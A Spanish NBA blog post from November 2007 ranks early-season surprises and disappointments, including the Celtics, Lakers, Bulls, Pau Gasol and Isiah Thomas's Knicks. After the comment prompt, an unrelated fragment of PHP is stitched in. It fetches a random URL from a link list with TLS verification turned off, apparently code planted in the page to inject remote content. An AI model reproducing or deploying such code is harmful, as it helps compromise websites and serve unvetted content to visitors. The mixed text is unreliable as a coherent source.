Acordes y desacuerdos (22 de Noviembre)

22 de November de 2007 por txusma

La mayoría de equipos han jugado más de 10 partidos y es el momento de hacer una primera valoración de lo que está siendo la temporada. Esperemos que Woody Allen no tenga problemas en cedernos temporalmente el título de su película para catalogar las sorpresas y decepciones de, como diría Montes, el inicio del curso baloncestístico 2007/2008. Jugadores como Chris Kaman, Marvin Williams, Ben Wallace o Pau Gasol y equipos como Los Angeles Lakers, Boston Celtics o Chicago Bulls pasan por nuestro particular microscopio.

Acordes

Todos sabíamos que este año iban a disfrutar en Boston porque, ¿quién no disfruta con un equipo con Kevin Garnett, Paul Pierce y Ray Allen? Pero reconoced que también teníamos nuestras dudas sobre la unión de tanto ego y tanta estadística baldía. Pero hay que reconocerlo: las 3 estrellas luchan por un objetivo claro, el anillo, y lo hacen con una ilusión, una fuerza y una entrega que ya les gustaría tener a algunos rookies.

Chris Kaman ha asumido el liderazgo de los Clippers en ausencia del lesionado Elton Brand. Tras una temporada un tanto decepcionante Kaman vuelve más fuerte que nunca promediando 18 puntos y 14 rebotes por partido.

Seguramente en Orlando esperaban mucho de Rashard Lewis y tenían la sensación de que era la pieza que faltaba para completar su puzzle. Pues el puzzle se completó formando un equipo compensado en ataque y defensa y basado en el talento de Lewis y el poderío bajo los tableros de Dwight Howard. Darán que hablar mucho este año. De momento líderes de la Southeast y seguro que por mucho tiempo.

Para que engañar a nadie. Yo no esperaba que los Lakers estuvieran ahora mismo con un 7-3 a su favor y más habiendo jugado con equipos como Phoenix, Utah, Detroit o San Antonio. El cambio de Derek Fisher por Smush Parker se nota y además Farmar y Bynum han sido desequilibrantes en varios partidos. Buenas noticias para Kobe que puede tener un equipo ganador en casa y él sin saberlo.

El número 2 del draft del 2005, Marvin Williams, ha empezado la temporada pletórico de forma. Lejos queda ya la irregularidad que le caracterizaró las 2 primeras temporadas y ahora se ha convertido en todo un seguro de vida para su equipo, los Atlanta Hawks. Como dicen por ahí: “la experiencia es un grado”.

 

Y desacuerdos…

Poca gente no estará de acuerdo en catalogar a los Bulls como la principal decepción de este inicio de temporada. Acumulan un balance de 2-8 y presentan un juego previsible, poco vistoso y tremendamente ineficiente. Los rumores de traspaso no son excusa para una plantilla en la que Ben Gordon y sobre todo Kirk Hinrich encarnan su pésimo rendimiento.

A Ben Wallace debemos darle de comer aparte. Su rendimiento ha bajado en picado quedando en el recuerdo sus exhibiciones reboteadoras y defensivas con los Detroit Pistons. Posiblemente el estilo de juego de los Bulls, no muy dados a defender, no le beneficie pero ya se vislumbra el declive del mejor defensor de los últimos años.

Pau nos tiene mal acostumbrados porque si no supiéramos de lo que es capaz, una media de 17 puntos y 7 rebotes nos parecería inmejorable. Pero lo conocemos y sabemos que lo puede hacer mucho mejor. El año pasado, sin ir más lejos, su media era de 20-10. Sabemos que el juego al más puro estilo Phoenix Suns impuesto por Iavaroni no le beneficia en absoluto y si añadimos que en Memphis se han vuelto locos dando los galones a un segundo año como Rudy Gay, podemos deducir las causas de este bajón.

No es una decepción porque ya no engaña a nadie pero en algún sitio ha de quedar constancia de nuestra animadversión por Isiah Thomas. Continúa inmerso en su particular cruzada para hundir a los New York Knicks desde dentro y este año ya los ha arrastrado a un parcial de 2-8. No contento con eso decide sentar en el banquillo a su hombre más talentoso, Stephon Marbury, y está más que decidido a condenarlo al ostracismo esta temporada y la que sigue. ¿Hasta cuándo le aguantarán los aficionados de la Gran Manzana?

Ni sin Wade ni con Wade. El tiempo de los Miami Heat ya ha pasado y Pat Riley no da con la tecla que sitúe a su equipo de nuevo en el candelero. Los fichajes de Ricky Davis, Mark Blount, Anfernee Hardaway y sobre todo el infumable Smush Parker no aportan nada nuevo al equipo y Wade empieza ya a pensar en el 2010, fecha en la que se convertirá en agente libre.

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>